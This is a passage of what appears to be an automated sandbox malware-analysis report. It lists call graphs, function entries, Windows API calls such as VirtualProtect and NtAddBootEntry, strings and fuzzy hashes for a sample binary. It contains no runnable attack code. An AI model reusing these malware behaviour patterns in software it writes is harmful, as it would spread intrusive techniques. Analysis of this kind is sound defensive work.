7ff6c5322337 4386->4387 4424 7ff6c5321e65 4425 7ff6c5321e67 signal 4424->4425 4426 7ff6c5321e7c 4425->4426 4428 7ff6c5321e99 4425->4428 4427 7ff6c5321e82 signal 4426->4427 4426->4428 4427->4428 4362 7ff6c5322104 4363 7ff6c5322111 EnterCriticalSection 4362->4363 4365 7ff6c5322218 4362->4365 4364 7ff6c532220b LeaveCriticalSection 4363->4364 4370 7ff6c532212e 4363->4370 4364->4365 4366 7ff6c5322272 4365->4366 4368 7ff6c5322241 DeleteCriticalSection 4365->4368 4369 7ff6c5322230 free 4365->4369 4367 7ff6c532214d TlsGetValue GetLastError 4367->4370 4368->4366 4369->4368 4369->4369 4370->4364 4370->4367 4436 7ff6c532216f 4437 7ff6c5322178 InitializeCriticalSection 4436->4437 4438 7ff6c5322185 4436->4438 4437->4438 4371 7ff6c5321e10 4373 7ff6c5321e2f 4371->4373 4372 7ff6c5321eb5 4373->4372 4374 7ff6c5321ecc 4373->4374 4377 7ff6c5321e55 4373->4377 4374->4372 4375 7ff6c5321ed3 signal 4374->4375 4375->4372 4376 7ff6c5321ee4 4375->4376 4376->4372 4378 7ff6c5321eea signal 4376->4378 4377->4372 4379 7ff6c5321f12 signal 4377->4379 4378->4372 4379->4372 4407 7ff6c5322050 4408 7ff6c53220cf 4407->4408 4409 7ff6c532205e EnterCriticalSection 4407->4409 4410 7ff6c5322079 4409->4410 4411 7ff6c53220c2 LeaveCriticalSection 4409->4411 4410->4411 4412 7ff6c53220bd free 4410->4412 4411->4408 4412->4411 4413 7ff6c5321fd0 4414 7ff6c5322033 4413->4414 4415 7ff6c5321fe4 4413->4415 4415->4414 4416 7ff6c5321ffd EnterCriticalSection LeaveCriticalSection 4415->4416 4416->4414 4439 7ff6c5321a70 4440 7ff6c5321a7d 4439->4440 4443 7ff6c532199e 4439->4443 4441 7ff6c5321a0f 4442 7ff6c53219e9 VirtualProtect 4442->4443 4443->4441 4443->4442 4388 7ff6c5321ab3 4389 7ff6c5321ade 4388->4389 4390 7ff6c5321b36 4389->4390 4392 7ff6c5321a0f 4389->4392 4393 7ff6c532199e 4389->4393 4391 7ff6c5321ba0 4 API calls 4390->4391 4391->4392 4393->4392 4394 7ff6c53219e9 VirtualProtect 4393->4394 4394->4393 4347 7ff6c5321394 4348 7ff6c53283f0 malloc 4347->4348 4349 7ff6c53213b8 4348->4349 4350 7ff6c53213c6 NtAddBootEntry 4349->4350

                                                        Executed Functions

                                                        Function 00007FF6C5321160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
                                                        • Instruction ID: 15ffc065d0f7ebe64b7d155960116db35449b2efb0eac399893ae6816e708396
                                                        • Opcode Fuzzy Hash: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
                                                        • Instruction Fuzzy Hash: 6B514A25E29E4685F7119F15EE4937923A0BF44F82F849031D98DC77A3EE3CAC818391
                                                        Function 00007FF6C5321394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtAddBootEntry.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5321156), ref: 00007FF6C53213F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: BootEntry
                                                        • String ID:
                                                        • API String ID: 3727276938-0
                                                        • Opcode ID: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                        • Instruction ID: a726939c0f15b6e17741530ee5b225b0094f06be47af9284b445ff061ee8a4d9
                                                        • Opcode Fuzzy Hash: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                        • Instruction Fuzzy Hash: 53F0EC7192CF4282D615CF51FC6442A7760FB98B81F008835EADC83726EF3CE8508B81

                                                        Non-executed Functions

                                                        Function 00007FF6C5323B50 Relevance: 121.3, APIs: 67, Strings: 1, Instructions: 2253COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                        • String ID:
                                                        • API String ID: 3604702941-3916222277
                                                        • Opcode ID: 611dad86bca879dc2385dc59deb561307969c2c5d8425c439f0e58d6370a3a28
                                                        • Instruction ID: 579118dad8b2cb72991d6b88deafb29860b59f041c37b8eca2f791e9e6815332
                                                        • Opcode Fuzzy Hash: 611dad86bca879dc2385dc59deb561307969c2c5d8425c439f0e58d6370a3a28
                                                        • Instruction Fuzzy Hash: 14539E25C2CAC284F7218F29EC063F46760BF95B46F845235D9CCD69A6FF6C6A84C364
                                                        Function 00007FF6C5323350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction ID: 7e75a99db70504cfab90d917eec25af5abcb8c540519d62b4ae0653372850428
                                                        • Opcode Fuzzy Hash: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction Fuzzy Hash: D8B16F2191CAC285F3218F24EC493BAB7A0FF94B45F404135EACD96A9AEF7DD945CB40
                                                        Function 00007FF6C5322690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction ID: 19f420034747452a50eb97ed6b97d1b47418de8dff91dff612ccea08a414011f
                                                        • Opcode Fuzzy Hash: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction Fuzzy Hash: FA027C32918B8586E7208F15EC453BA77A0FB84BA5F404235EADC83BA6EF7CD585C750
                                                        Function 00007FF6C5321BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF6C532A4B4,00007FF6C532A4B4,?,?,00007FF6C5320000,?,00007FF6C5321991), ref: 00007FF6C5321C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF6C532A4B4,00007FF6C532A4B4,?,?,00007FF6C5320000,?,00007FF6C5321991), ref: 00007FF6C5321CC7
                                                        • memcpy.MSVCRT ref: 00007FF6C5321CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF6C532A4B4,00007FF6C532A4B4,?,?,00007FF6C5320000,?,00007FF6C5321991), ref: 00007FF6C5321D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction ID: abd08136541581b1b779cd19896b0540fea68b3fafb41a153a55b07aa20e7431
                                                        • Opcode Fuzzy Hash: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction Fuzzy Hash: 71419065A29E5681EA518F45DD486B827A0FB84FC2F954132DE8DC3792EE3CED81C380
                                                        Function 00007FF6C5322104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction ID: e8bcb0c1d258cb0ca3e4c13d6666a5f7334a0bd7c61d117cbdb0ba1f7aed672b
                                                        • Opcode Fuzzy Hash: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction Fuzzy Hash: 5121DE25A29E0282FA659F41DD483752360BF14F92F850031D98EC7EB5EF7DBC868794
                                                        Function 00007FF6C5321E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 640 7ff6c5321e10-7ff6c5321e2d 641 7ff6c5321e2f-7ff6c5321e38 640->641 642 7ff6c5321e3e-7ff6c5321e48 640->642 641->642 643 7ff6c5321f60-7ff6c5321f69 641->643 644 7ff6c5321e4a-7ff6c5321e53 642->644 645 7ff6c5321ea3-7ff6c5321ea8 642->645 646 7ff6c5321ecc-7ff6c5321ed1 644->646 647 7ff6c5321e55-7ff6c5321e60 644->647 645->643 648 7ff6c5321eae-7ff6c5321eb3 645->648 651 7ff6c5321f23-7ff6c5321f2d 646->651 652 7ff6c5321ed3-7ff6c5321ee2 signal 646->652 647->645 649 7ff6c5321efb-7ff6c5321f0a call 7ff6c5328990 648->649 650 7ff6c5321eb5-7ff6c5321eba 648->650 649->651 661 7ff6c5321f0c-7ff6c5321f10 649->661 650->643 653 7ff6c5321ec0 650->653 654 7ff6c5321f2f-7ff6c5321f3f 651->654 655 7ff6c5321f43-7ff6c5321f45 651->655 652->651 656 7ff6c5321ee4-7ff6c5321ee8 652->656 653->651 662 7ff6c5321f5a 654->662 655->643 658 7ff6c5321eea-7ff6c5321ef9 signal 656->658 659 7ff6c5321f4e-7ff6c5321f53 656->659 658->643 659->662 663 7ff6c5321f12-7ff6c5321f21 signal 661->663 664 7ff6c5321f55 661->664 662->643 663->643 663->651 664->662
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction ID: 4a53892e93a9ea3e4da46bb2f04c54cc7e56f6a6ba9e2914b43590140029f394
                                                        • Opcode Fuzzy Hash: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction Fuzzy Hash: 96218121F2C90651FB755E149E8837A12819F84F66F258631DEBDC37DAFE2CAC8182D1
                                                        Function 00007FF6C5321880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5321247), ref: 00007FF6C53219F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction ID: dbb7ae90e76724d601de16417cf804158cd0ce57da5280343d5608fe2f929622
                                                        • Opcode Fuzzy Hash: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction Fuzzy Hash: C5516C36F28A46C6EB108F25DD497B82761BB14F96F444131DA9C87796EE3CEC86C780
                                                        Function 00007FF6C5321800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 698 7ff6c5321800-7ff6c5321810 699 7ff6c5321812-7ff6c5321822 698->699 700 7ff6c5321824 698->700 701 7ff6c532182b-7ff6c5321867 call 7ff6c5322290 fprintf 699->701 700->701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction ID: dfbb25afb583f0f7ebf3de71f6d739923476153ea30ee361d73b79b3d31d481c
                                                        • Opcode Fuzzy Hash: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction Fuzzy Hash: 9BF0C812E28E8582E6119F25ED490BDA361EB49BC2F509231DECDD3652EF1CF5818340
                                                        Function 00007FF6C532219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2143543005.00007FF6C5321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C5320000, based on PE: true
                                                        • Associated: 00000000.00000002.2143515806.00007FF6C5320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143588691.00007FF6C5329000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143620324.00007FF6C532B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143704734.00007FF6C532C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2143995132.00007FF6C55A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2144022633.00007FF6C55A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff6c5320000_12Jh49DCAj.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction ID: f9dc10b0f2c6fd72c01b85e40e490fbcbe1bfa69e81dda13f2f0ce032ed562bb
                                                        • Opcode Fuzzy Hash: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction Fuzzy Hash: 47011E25B29E0282E6568F01ED082381260BF04F92F450031DE8DC3EA5FF7CBD928794

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1348
                                                        Total number of Limit Nodes:2
                                                        execution_graph 3809 7ff759bf1e65 3810 7ff759bf1e67 signal 3809->3810 3811 7ff759bf1e7c 3810->3811 3813 7ff759bf1e99 3810->3813 3812 7ff759bf1e82 signal 3811->3812 3811->3813 3812->3813 3872 7ff759bf1ac3 3873 7ff759bf199e 3872->3873 3874 7ff759bf1b36 3873->3874 3876 7ff759bf19e9 VirtualProtect 3873->3876 3877 7ff759bf1a0f 3873->3877 3875 7ff759bf1ba0 4 API calls 3874->3875 3875->3877 3876->3873 3829 7ff759bf2104 3830 7ff759bf2111 EnterCriticalSection 3829->3830 3831 7ff759bf2218 3829->3831 3833 7ff759bf220b LeaveCriticalSection 3830->3833 3837 7ff759bf212e 3830->3837 3832 7ff759bf2272 3831->3832 3834 7ff759bf2241 DeleteCriticalSection 3831->3834 3836 7ff759bf2230 free 3831->3836 3833->3831 3834->3832 3835 7ff759bf214d TlsGetValue GetLastError 3835->3837 3836->3834 3836->3836 3837->3833 3837->3835 2488 7ff759bf1140 2491 7ff759bf1160 2488->2491 2490 7ff759bf1156 2492 7ff759bf118b 2491->2492 2493 7ff759bf11b9 2491->2493 2492->2493 2496 7ff759bf1190 2492->2496 2494 7ff759bf11d3 2493->2494 2495 7ff759bf11c7 _amsg_exit 2493->2495 2498 7ff759bf1201 _initterm 2494->2498 2499 7ff759bf121a 2494->2499 2495->2494 2496->2493 2497 7ff759bf11a0 Sleep 2496->2497 2497->2493 2497->2496 2498->2499 2516 7ff759bf1880 2499->2516 2501 7ff759bf1247 SetUnhandledExceptionFilter 2502 7ff759bf126a 2501->2502 2503 7ff759bf126f malloc 2502->2503 2504 7ff759bf128b 2503->2504 2507 7ff759bf12d2 2503->2507 2505 7ff759bf12a0 strlen malloc memcpy 2504->2505 2505->2505 2506 7ff759bf12d0 2505->2506 2506->2507 2526 7ff759bf3b50 2507->2526 2509 7ff759bf1315 2510 7ff759bf1344 2509->2510 2511 7ff759bf1324 2509->2511 2514 7ff759bf1160 93 API calls 2510->2514 2512 7ff759bf132d _cexit 2511->2512 2513 7ff759bf1338 2511->2513 2512->2513 2513->2490 2515 7ff759bf1366 2514->2515 2515->2490 2517 7ff759bf18a2 2516->2517 2522 7ff759bf1a0f 2516->2522 2518 7ff759bf1956 2517->2518 2521 7ff759bf199e 2517->2521 2517->2522 2518->2521 2701 7ff759bf1ba0 2518->2701 2520 7ff759bf19e9 VirtualProtect 2520->2521 2521->2520 2521->2522 2523 7ff759bf1b36 2521->2523 2522->2501 2524 7ff759bf1ba0 4 API calls 2523->2524 2525 7ff759bf1b53 2524->2525 2525->2522 2528 7ff759bf3b66 2526->2528 2527 7ff759bf3c60 wcslen 2711 7ff759bf153f 2527->2711 2528->2527 2533 7ff759bf3d60 2536 7ff759bf3d7a memset wcscat memset 2533->2536 2538 7ff759bf3dd3 2536->2538 2539 7ff759bf3e23 wcslen 2538->2539 2540 7ff759bf3e35 2539->2540 2545 7ff759bf3e7c 2539->2545 2541 7ff759bf3e50 _wcsnicmp 2540->2541 2542 7ff759bf3e66 wcslen 2541->2542 2541->2545 2542->2541 2542->2545 2543 7ff759bf3edd wcscpy wcscat memset 2544 7ff759bf3f1c 2543->2544 2546 7ff759bf4024 wcscpy wcscat 2544->2546 2545->2543 2547 7ff759bf404f memset 2546->2547 2549 7ff759bf4131 2546->2549 2548 7ff759bf4070 2547->2548 2550 7ff759bf40d5 wcslen 2548->2550 2851 7ff759bf2df0 2549->2851 2551 7ff759bf40eb 2550->2551 2557 7ff759bf412c 2550->2557 2553 7ff759bf4100 _wcsnicmp 2551->2553 2555 7ff759bf4116 wcslen 2553->2555 2553->2557 2554 7ff759bf4234 2554->2509 2555->2553 2555->2557 2556 7ff759bf43a3 wcscpy wcscat memset 2558 7ff759bf43e5 2556->2558 2557->2556 2559 7ff759bf442a wcscpy wcscat memset 2558->2559 2560 7ff759bf4470 2559->2560 2561 7ff759bf44d5 wcscpy wcscat memset 2560->2561 2562 7ff759bf451b 2561->2562 2563 7ff759bf454b wcscpy wcscat 2562->2563 2564 7ff759bf6730 memcpy 2563->2564 2565 7ff759bf457d 2563->2565 2564->2565 2566 7ff759bf2df0 11 API calls 2565->2566 2567 7ff759bf472c 2566->2567 2568 7ff759bf2df0 11 API calls 2567->2568 2569 7ff759bf4840 memset 2568->2569 2570 7ff759bf4861 2569->2570 2571 7ff759bf48a4 wcscpy wcscat memset 2570->2571 2572 7ff759bf48ed 2571->2572 2573 7ff759bf4930 wcscpy wcscat wcslen 2572->2573 2863 7ff759bf146d 2573->2863 2576 7ff759bf4a44 2579 7ff759bf4b3a wcslen 